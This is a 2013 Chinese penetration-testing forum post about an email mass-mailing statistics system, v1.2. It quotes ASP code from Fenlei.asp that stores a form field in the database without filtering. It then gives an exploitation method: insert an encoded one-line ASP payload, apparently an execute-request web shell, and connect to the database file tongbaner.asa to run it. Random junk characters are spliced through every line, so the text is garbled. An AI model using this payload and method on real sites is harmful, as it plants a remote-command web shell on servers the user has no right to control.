中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
, M8 E8 I& n' r4 C; ?9 a
/ |. E7 K5 g- I) C+ [IF Request.QueryString("Action")="del" Then 6 Y6 z# Y4 Q3 p5 a. D- j' O# G
ID=Request.QueryString("ID")
! `- Q+ N8 B! a( @  u, x: j* }/ iIF Countss ("tui","Fenlei",ID )<>0 then 8 T+ O9 {" Q/ J9 k& ^$ n' X! C, [4 T7 F
'略 : F1 i6 |1 L" ^* y
IF Request.QueryString("Action")="Add" Then & P+ o  N% r  Y& B+ D/ Z
Tname=Request.Form("Typename") - V+ s8 v4 F! T
Set Rs=Server.CreateObject("adodb.Recordset")
3 K# a* u# g6 Z+ LSql="Select * From Fenlei Order by id Desc " ' Z' W8 _$ \. G$ P
Rs.Open Sql,Conn,1,3 ! r/ ]5 h* |) d! k
Rs.Addnew ; D* s$ h! Q* q* A7 Y; @1 w2 U
Rs("Typename")=Tname
8 @: M0 @2 m, T3 G/ W: U( X1 G'略
# E- {5 X- m* j$ i  I' ~Set Rs=Server.CreateObject("adodb.Recordset")
2 k$ Q3 x- A# K0 g0 _+ q9 g! F; E: [Sql="Select * From Fenlei Order by id Desc " & F# D1 ^) ?' J1 Q2 ^
Rs.Open Sql,Conn,1,1 1 k' H9 [% i) l5 l
'略 ) k( Y1 j2 p) d/ [- i" d
%>
) b9 ~7 t4 I& N0 _/ J
/ s6 b9 p' R0 O/ W
" @6 S# c& Z4 I, x
/ @/ I/ A/ _8 s& J$ P* D没有过滤,直接写入数据库。
3 g$ @  W! @9 l9 \* J& h, t& K
' d. v* f- c9 G/ O) Z利用方法:8 ~+ C, w; q) d$ q# ]0 C4 ?. e
. K* l- U6 x$ o! G
插入:┼攠數畣整爠煥敵瑳∨≡┩>* L3 t8 O* j: N6 u

8 f# ~! l) [6 {8 E
) a# V: C% s8 f, X1 V* o1 p连接: http://www.xxx.com/###tongbaner.asa $ V5 B6 c; m. M" R! U! k1 F
'默认安装文件:
9 ]% }7 G$ a+ S: y& Q+ V'install.asp: b9 y$ {  }: k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2